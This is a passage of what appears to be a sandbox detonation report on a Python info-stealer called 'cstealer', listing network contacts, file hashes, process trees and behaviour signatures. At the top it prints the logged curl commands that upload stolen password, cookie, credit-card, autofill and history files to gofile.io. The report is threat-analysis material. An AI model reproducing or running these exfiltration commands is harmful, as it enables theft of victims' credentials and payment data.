curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt""
C:\Windows\system32\curl.exe
curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt""
C:\Windows\system32\curl.exe
curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt""
C:\Windows\system32\curl.exe
curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt""
C:\Windows\system32\curl.exe
curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | rentry.co | udp |
| US | 172.67.75.40:443 | rentry.co | tcp |
| US | 172.67.75.40:443 | rentry.co | tcp |
| US | 172.67.75.40:443 | rentry.co | tcp |
| US | 172.67.75.40:443 | rentry.co | tcp |
| US | 8.8.8.8:53 | 40.75.67.172.in-addr.arpa | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| FR | 45.112.123.239:443 | store2.gofile.io | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 253.102.89.159.in-addr.arpa | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| GB | 2.23.210.82:80 | r11.o.lencr.org | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.210.23.2.in-addr.arpa | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| FR | 45.112.123.239:443 | store2.gofile.io | tcp |
| N/A | 127.0.0.1:49924 | tcp | |
| N/A | 127.0.0.1:49939 | tcp | |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| FR | 45.112.123.239:443 | store2.gofile.io | tcp |
| N/A | 127.0.0.1:49943 | tcp | |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI43202\python311.dll
| MD5 | 58e01abc9c9b5c885635180ed104fe95 |
| SHA1 | 1c2f7216b125539d63bd111a7aba615c69deb8ba |
| SHA256 | de1b95d2e951fc048c84684bc7df4346138910544ee335b61fc8e65f360c3837 |
| SHA512 | cd32c77191309d99aeed47699501b357b35669123f0dd70ed97c3791a009d1855ab27162db24a4bd9e719b68ee3b0539ee6db88e71abb9a2d4d629f87bc2c081 |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\VCRUNTIME140.dll
| MD5 | 49c96cecda5c6c660a107d378fdfc3d4 |
| SHA1 | 00149b7a66723e3f0310f139489fe172f818ca8e |
| SHA256 | 69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc |
| SHA512 | e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\base_library.zip
| MD5 | 1df66a5a8d8c7bc333ed59a827e131e3 |
| SHA1 | 614986f57b9922cedf4df5ebadaa10ea307d46d1 |
| SHA256 | 190afb1aa885c2aa3516ab343e35f6b10472f4314492c8c4492c7d0f2add2f80 |
| SHA512 | 6568af0d41b1d2f1d4a75e25705777ec263c4a903db164923f4a10118218270a2b003f16f39ae238fe71f0dc1ad52d0cc1ac93a7bf2c6643d009f825dd00e1aa |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\_ctypes.pyd
| MD5 | 6114277c6fc040f68d25ca90e25924cd |
| SHA1 | 028179c77cb3ba29cd8494049421eaa4900ccd0e |
| SHA256 | f07fe92ce85f7786f96a4d59c6ee5c05fe1db63a1889ba40a67e37069639b656 |
| SHA512 | 76e8ebefb9ba4ea8dcab8fce50629946af4f2b3f2f43163f75483cfb0a97968478c8aaef1d6a37be85bfc4c91a859deda6da21d3e753daefe084a203d839353d |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\libffi-8.dll
| MD5 | 0f8e4992ca92baaf54cc0b43aaccce21 |
| SHA1 | c7300975df267b1d6adcbac0ac93fd7b1ab49bd2 |
| SHA256 | eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a |
| SHA512 | 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978 |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\_bz2.pyd
| MD5 | 4438affaaa0ca1df5b9b1cdaa0115ec1 |
| SHA1 | 4eda79eaf3de614d5f744aa9eea5bfcf66e2d386 |
| SHA256 | ec91e2b4baca31b992d016b84b70f110ce2b1b2dfd54f5e5bef6270ed7d13b85 |
| SHA512 | 6992107ac4d2108e477bc81af667b8b8e5439231e7e9f4b15ce4bce1aeea811bc0f1aaa438be3b0e38597760cb504367512809ee1937c4b538a86724ae543ba6 |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\_lzma.pyd
| MD5 | 737119a80303ef4eccaa998d500e7640 |
| SHA1 | 328c67c6c4d297ac13da725bf24467d8b5e982e3 |
| SHA256 | 7158c1290ac29169160b3ec94d9c8bcde4012d67a555f325d44b418c54e2cc28 |
| SHA512 | 1c9920e0841a65b01a0b339c5f5254d1039ef9a16fe0c2484a7e2a9048727f2cc081817aa771b0c574fb8d1a5a49dc39798a3c5e5b5e64392e9c168e1827be7c |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\select.pyd
| MD5 | 653bdccb7af2aa9ccf50cb050fd3be64 |
| SHA1 | afe0a85425ae911694c250ab4cb1f6c3d3f2cc69 |
| SHA256 | e24a3e7885df9a18c29ba058c49c3adcf59e4b58107847b98eca365b6d94f279 |
| SHA512 | 07e841fda7a2295380bfa05db7a4699f18c6e639da91d8ee2d126d4f96e4cddaedbd490deb4d2a2e8e5877edfff877693f67a9dc487e29742943e062d7be6277 |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\_socket.pyd
| MD5 | 64a6c475f59e5c57b3f4dd935f429f09 |
| SHA1 | ca2e0719dc32f22163ae0e7b53b2caadb0b9d023 |
| SHA256 | d03fa645cde89b4b01f4a2577139fbb7e1392cb91dc26213b3b76419110d8e49 |
| SHA512 | cf9e03b7b34cc095fe05c465f9d794319aaa0428fe30ab4ddce14ba78e835edf228d11ec016fd31dfe9f09d84b6f73482fb8e0f574d1fd08943c1ec9e0584973 |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\_queue.pyd
| MD5 | 8bbed19359892f8c95c802c6ad7598e9 |
| SHA1 | 773fca164965241f63170e7a1f3a8fa17f73ea18 |
| SHA256 | 4e5b7c653c1b3dc3fd7519e4f39cc8a2fb2746e0ecdc4e433fe6029f5f4d9065 |
| SHA512 | 22ea7667689a9f049fa34ddae6b858e1af3e646a379d2c5a4aef3e74a4ff1a4109418b363c9be960127f1c7e020aa393a47885bc45517c9e9aebe71ec7cb61a0 |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\_ssl.pyd
| MD5 | a0b40f1f8fc6656c5637eacacf7021f6 |
| SHA1 | 38813e25ffde1eee0b8154fa34af635186a243c1 |
| SHA256 | 79d861f0670828dee06c2e3523e2f9a2a90d6c6996bde38201425aa4003119f1 |
| SHA512 | c18855d7c0069fff392d422e5b01fc518bbdf497eb3390c0b333ecac2497cd29abbdae4557e4f0c4e90321fba910fc3e4d235ce62b745fa34918f40fa667b713 |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\libcrypto-3.dll
| MD5 | 7a6a8c2a8c379b111cdceb66b18d687d |
| SHA1 | f3b8a4c731fa0145f224112f91f046fddf642794 |
| SHA256 | 8e13b53ee25825b97f191d77b51ed03966f8b435773fa3fbc36f3eb668fc569b |
| SHA512 | f2ef1702df861ef55ef397ad69985d62b675d348cab3862f6ca761f1ce3ee896f663a77d7b69b286be64e7c69be1215b03945781450b186fc02cfb1e4cb226b5 |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\libssl-3.dll
| MD5 | 64acb046fe68d64ee475e19f67253a3c |
| SHA1 | d9e66c9437ce6f775189d6fdbd171635193ec4cc |
| SHA256 | b21309abd3dbbb1bf8fb6aa3c250fc85d7b0d9984bf4c942d1d4421502f31a10 |
| SHA512 | f8b583981df528cf4f1854b94eff6f51dd9d4be91e6fa6329a8c4435b705457c868ae40ee030fa54bebb646a37b547bc182c9cbf0df9a07fea03a18cf85c6766 |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\_overlapped.pyd
| MD5 | ac053ef737e4f13b02bfa81f9e46170b |
| SHA1 | 5d8ebeb30671b74d736731696fedc78c89da0e1f |
| SHA256 | cb68e10748e2efd86f7495d647a2774cea9f97ad5c6fe179f90dc1c467b9280f |
| SHA512 | 6ac26f63981dc5e8dfb675880d6c43648e2bbe6711c75dcac20ebe4d8591e88fbfac3c60660ab28602352760b6f5e1cb587075072abd3333522e3e2549bfa02e |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\pyexpat.pyd
| MD5 | cdcf0e74a32ad7dfeda859a0ce4fcb20 |
| SHA1 | c72b42a59ba5d83e8d481c6f05b917871b415f25 |
| SHA256 | 91fe5b1b2de2847946e5b3f060678971d8127dfd7d2d37603fdcd31bd5c71197 |
| SHA512 | c26fdf57299b2c6085f1166b49bd9608d2dd8bc804034ebb03fb2bba6337206b6018bf7f74c069493ffae42f2e9d6337f6f7df5306b80b63c8c3a386bce69ea6 |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\_asyncio.pyd
| MD5 | 511a52bcb0bd19eda7aa980f96723c93 |
| SHA1 | b11ab01053b76ebb60ab31049f551e5229e68ddd |
| SHA256 | d1fb700f280e7793e9b0dca33310ef9cd08e9e0ec4f7416854dffaf6f658a394 |
| SHA512 | d29750950db2ecbd941012d7fbdd74a2bbd619f1a92616a212acb144da75880ce8a29ec3313acbc419194219b17612b27a1833074bbbaa291cdb95b05f8486ff |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\_brotli.cp311-win_amd64.pyd
| MD5 | d9fc15caf72e5d7f9a09b675e309f71d |
| SHA1 | cd2b2465c04c713bc58d1c5de5f8a2e13f900234 |
| SHA256 | 1fcd75b03673904d9471ec03c0ef26978d25135a2026020e679174bdef976dcf |
| SHA512 | 84f705d52bd3e50ac412c8de4086c18100eac33e716954fbcb3519f4225be1f4e1c3643d5a777c76f7112fae30ce428e0ce4c05180a52842dacb1f5514460006 |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\_hashlib.pyd
| MD5 | 1524882af71247adecf5815a4e55366a |
| SHA1 | e25014c793c53503bdff9af046140edda329d01b |
| SHA256 | 6f7742dfdd371c39048d775f37df3bc2d8d4316c9008e62347b337d64ebed327 |
| SHA512 | 5b954bb7953f19aa6f7c65ad3f105b77d37077950fb1b50d9d8d337bdd4b95343bac2f4c9fe17a02d1738d1f87eeef73dbbf5cdddcb470588cbc5a63845b188a |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\charset_normalizer\md__mypyc.cp311-win_amd64.pyd
| MD5 | 6cdca2fde9df198da58955397033af98 |
| SHA1 | e457c97721504d25f43b549d57e4538a62623168 |
| SHA256 | a4a758eabd1b2b45f3c4699bdfebc98f196dc691c0a3d5407e17fffffafc5df7 |
| SHA512 | 7b3c384ba9993d3192ed852191ff77bdcd3421cbc69ff636c6deb8fe7248e066573b68d80a8f280ae0c1cb015f79967d46d910455d932eaeac072c76d0757e92 |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\unicodedata.pyd
| MD5 | 1905b5d0f945499441e8cd58eb123d86 |
| SHA1 | 117e584e6fcc0e8cfc8e24e3af527999f14bac30 |
| SHA256 | b1788b81fa160e5120451f9252c7745cdde98b8ce59bf273a3dd867bb034c532 |
| SHA512 | ed88cd7e3259239a0c8d42d95fa2447fc454a944c849fa97449ad88871236fefdafe21dbfa6e9b5d8a54ddf1d5281ec34d314cb93d47ce7b13912a69d284f522 |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\charset_normalizer\md.cp311-win_amd64.pyd
| MD5 | 28af0ffb49cc20fe5af9fe8efa49d6f1 |
| SHA1 | 2c17057c33382ddffea3ca589018cba04c4e49d7 |
| SHA256 | f1e26ef5d12c58d652b0b5437c355a14cd66606b2fbc00339497dd00243081e0 |
| SHA512 | 9aa99e17f20a5dd485ae43ac85842bd5270ebab83a49e896975a8fa9f98ffc5f7585bef84ed46ba55f40a25e224f2640e85cebe5acb9087cf46d178ecc8029f0 |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\certifi\cacert.pem
| MD5 | 78d9dd608305a97773574d1c0fb10b61 |
| SHA1 | 9e177f31a3622ad71c3d403422c9a980e563fe32 |
| SHA256 | 794d039ffdf277c047e26f2c7d58f81a5865d8a0eb7024a0fac1164fea4d27cf |
| SHA512 | 0c2d08747712ed227b4992f6f8f3cc21168627a79e81c6e860ee2b5f711af7f4387d3b71b390aa70a13661fc82806cc77af8ab1e8a8df82ad15e29e05fa911bf |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\sqlite3.dll
| MD5 | b49b8fde59ee4e8178c4d02404d06ee7 |
| SHA1 | 1816fc83155d01351e191d583c68e722928cce40 |
| SHA256 | 1afd7f650596ad97fcf358b0e077121111641c38ca9d53132bab4c9588cf262f |
| SHA512 | a033ce87c2e503b386fb92aa79a7ec14d6c96e4a35d0cb76d4989bacd16f44c4ed5ac4e13057f05f9d199a3fd8545b9a25296515ec456f29c464d949ff34942a |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\_sqlite3.pyd
| MD5 | a7df575bf69570944b004dfe150e8caf |
| SHA1 | 2fd19be98a07347d59afd78c167601479aac94bb |
| SHA256 | b1223420e475348c0bfb90fae33fc44ce35d988270294158ec366893df221a4b |
| SHA512 | 18c381a4ded8d33271cbf0bea75af1c86c6d34cc436f68fb9342951c071c10d84cf9f96a0509c53e5886d47fed5bca113a7f7863f6873583daa7bb6af1aa9afa |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\_cffi_backend.cp311-win_amd64.pyd
| MD5 | fde9a1d6590026a13e81712cd2f23522 |
| SHA1 | ca99a48caea0dbaccf4485afd959581f014277ed |
| SHA256 | 16eccc4baf6cf4ab72acd53c72a1f2b04d952e07e385e9050a933e78074a7d5b |
| SHA512 | a522661f5c3eeea89a39df8bbb4d23e6428c337aac1d231d32b39005ea8810fce26af18454586e0e94e51ea4ac0e034c88652c1c09b1ed588aeac461766981f4 |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\Crypto\Cipher\_raw_ctr.pyd
| MD5 | a34f499ee5f1b69fc4fed692a5afd3d6 |
| SHA1 | 6a37a35d4f5f772dab18e1c2a51be756df16319a |
| SHA256 | 4f74bcf6cc81bac37ea24cb1ef0b17f26b23edb77f605531857eaa7b07d6c8b2 |
| SHA512 | 301f7c31dee8ff65bb11196f255122e47f3f1b6b592c86b6ec51ab7d9ac8926fecfbe274679ad4f383199378e47482b2db707e09d73692bee5e4ec79c244e3a8 |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\Crypto\Cipher\_raw_ofb.pyd
| MD5 | a13584f663393f382c6d8d5c0023bc80 |
| SHA1 | d324d5fbd7a5dba27aa9b0bdb5c2aebff17b55b1 |
| SHA256 | 13c34a25d10c42c6a12d214b2d027e5dc4ae7253b83f21fd70a091fedac1e049 |
| SHA512 | 14e4a6f2959bd68f441aa02a4e374740b1657ab1308783a34d588717f637611724bc90a73c80fc6b47bc48dafb15cf2399dc7020515848f51072f29e4a8b4451 |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\Crypto\Cipher\_raw_cfb.pyd
| MD5 | 3142c93a6d9393f071ab489478e16b86 |
| SHA1 | 4fe99c817ed3bcc7708a6631f100862ebda2b33d |
| SHA256 | 5ea310e0f85316c8981ed6293086a952fa91a6d12ca3f8af9581521ee2b15586 |
| SHA512 | dcafec54bd9f9f42042e6fa4ac5ed53feb6cf8d56ada6a1787cafc3736aa72f14912bbd1b27d0af87e79a6d406b0326602ecd1ad394acdc6275aed4c41cdb9ef |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\Crypto\Util\_strxor.pyd
| MD5 | fae081b2c91072288c1c8bf66ad1aba5 |
| SHA1 | cd23ddb83057d5b056ca2b3ab49c8a51538247de |
| SHA256 | af76a5b10678f477069add6e0428e48461fb634d9f35fb518f9f6a10415e12d6 |
| SHA512 | 0adb0b1088cb6c8f089cb9bf7aec9eeeb1717cf6cf44b61fb0b053761fa70201ab3f7a6461aaae1bc438d689e4f8b33375d31b78f1972aa5a4bf86afad66d3a4 |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\Crypto\Cipher\_raw_cbc.pyd
| MD5 | 0c46d7b7cd00b3d474417de5d6229c41 |
| SHA1 | 825bdb1ea8bbfe7de69487b76abb36196b5fdac0 |
| SHA256 | 9d0a5c9813ad6ba129cafef815741636336eb9426ac4204de7bc0471f7b006e1 |
| SHA512 | d81b17b100a052899d1fd4f8cea1b1919f907daa52f1bad8dc8e3f5afc230a5bca465bbac2e45960e7f8072e51fdd86c00416d06cf2a1f07db5ad8a4e3930864 |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\Crypto\Cipher\_raw_ecb.pyd
| MD5 | dedae3efda452bab95f69cae7aebb409 |
| SHA1 | 520f3d02693d7013ea60d51a605212efed9ca46b |
| SHA256 | 6248fdf98f949d87d52232ddf61fada5ef02cd3e404bb222d7541a84a3b07b8a |
| SHA512 | 8c1cab8f34de2623a42f0750f182b6b9a7e2affa2667912b3660af620c7d9ad3bd5b46867b3c2d50c0cae2a1bc03d03e20e4020b7ba0f313b6a599726f022c6c |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\Crypto\Hash\_SHA1.pyd
| MD5 | 9d15862569e033c5aa702f9e4041c928 |
| SHA1 | 11376e8cb76ad2d9a7d48d11f4a74fb12b78bcf6 |
| SHA256 | 8970df77d2f73350360dbe68f937e0523689ff3d7c0be95eb7ca5820701f1493 |
| SHA512 | 322f0f4947c9d5d2800deebfd198eabe730d44209c1b61bb9fd0f7f9ed5f719ae49f8397f7920bdb368bb386a598e9b215502dc46fbe72f9340876cf40affc8a |
C:\Users\Admin\AppData\Local\Temp\_MEI43202\Crypto\Hash\_BLAKE2s.pyd
| MD5 | 06d3e941860bb0abedf1baf1385d9445 |
| SHA1 | e8c16c3e8956ba99a2d0de860dcfc5021f1d7de5 |
| SHA256 | 1c340d2625dad4f07b88bb04a81d5002aabf429561c92399b0eb8f6a72432325 |
| SHA512 | 6f62acff39b77c1ec9f161a9bfa94f8e3b932d56e63daee0093c041543993b13422e12e29c8231d88bc85c0573ad9077c56aa7f7a307e27f269da17fba8ee5a3 |
C:\Users\Admin\AppData\Local\Tempcstzmbjujy.db
| MD5 | 1ac9296bf54211fc69a717d265d08da7 |
| SHA1 | 84aa58b01e344562626c039a6befe45aa50480a4 |
| SHA256 | 2663aa18fa523dd88df4d099e859c78e8f488ed3ab2037156a0218d9d00ec46b |
| SHA512 | 9df862aca72a3f706c1fefd02fbca3f6f5b4e2b2c27fe336a5a60e86cbc81b4ab5edce0e618d766d08ed335a84f7b8617bf94fef48f6737f3b04f5a612e11a3b |
C:\Users\Admin\AppData\Local\Tempcsghutsbrz.db
| MD5 | 87210e9e528a4ddb09c6b671937c79c6 |
| SHA1 | 3c75314714619f5b55e25769e0985d497f0062f2 |
| SHA256 | eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1 |
| SHA512 | f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-12 18:14
Reported
2024-11-12 18:31
Platform
win10ltsc2021-20241023-en
Max time kernel
582s
Max time network
442s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4324 wrote to memory of 2124 | N/A | C:\Windows\system32\OpenWith.exe | C:\Windows\system32\NOTEPAD.EXE |
| PID 4324 wrote to memory of 2124 | N/A | C:\Windows\system32\OpenWith.exe | C:\Windows\system32\NOTEPAD.EXE |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\cstealer.pyc
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\cstealer.pyc
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fd.api.iris.microsoft.com | udp |
| IE | 20.223.35.26:443 | fd.api.iris.microsoft.com | tcp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.65.42.20.in-addr.arpa | udp |